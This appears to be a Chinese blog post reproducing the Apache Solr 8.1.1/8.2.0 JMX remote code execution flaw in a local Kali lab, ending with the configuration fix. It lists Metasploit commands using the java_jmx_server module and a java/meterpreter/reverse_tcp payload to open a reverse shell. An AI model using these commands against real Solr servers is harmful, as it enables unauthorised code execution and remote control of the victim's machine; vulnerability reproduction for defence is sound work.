美文网首页
Apache Solr JMX服务远程代码执行漏洞

Apache Solr JMX服务远程代码执行漏洞

作者: 7hang_ | 来源:发表于2020-03-03 18:15 被阅读0次

    0x00 背景描述

    Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在不安全的选项ENABLE_REMOTE_JMX_OPTS="true"。如果受害者使用了该默认配置,则会在默认端口18983开放JMX服务,且默认未开启认证。任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击,执行任意代码。

    0x01 影响版本

    Apache Solr8.1.1和8.2.0版本

    0x02 漏洞危害

    如果受害者使用了该默认配置,则会在默认端口18983开放JMX服务,且默认未开启认证。任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击,执行任意代码.

    0x03 复现环境

    Solr 8.20

    Java环境

    kali系统

    因为Solr 8.20 需要java环境支持,而kali系统本身内置openjdk版本(我的是java10),所以我们无需另外下载java环境。

    安装 Apache Solr 8.20

    wget https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip

    解压安装包

              unzip solr-8.2.0.zip

    切换到bin目录启动Solr

    ./solr  start  -force

    成功访问ip:8983(Solr默认端口)

    0x04 漏洞复现

    我们在搭建完我们漏洞环境,之后我们可以来复现我们的漏洞。

    我们可以用MSF中的exploit/multi/misc/java_jmx_server模块拉进行漏洞复现。(使用我是用kali搭建漏洞环境原因,使用127.0.0.1本地地址作为攻击目标)

    use exploit/multi/misc/java_jmx_server

    set RHOST 127.0.0.1

    set RPORT 18983

    设置payload java/meterpreter/reverse_tcp

    set payload java/meterpreter/reverse_tcp

    set LHOST 127.0.0.1

    set LPORT  4444

    执行完成,发现成功建立连接

    0x05 漏洞修复

    将solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS选项设置为false,然后重启Solr服务。

    相关文章

      网友评论

          本文标题:Apache Solr JMX服务远程代码执行漏洞

          本文链接:https://www.haomeiwen.com/subject/owhklhtx.html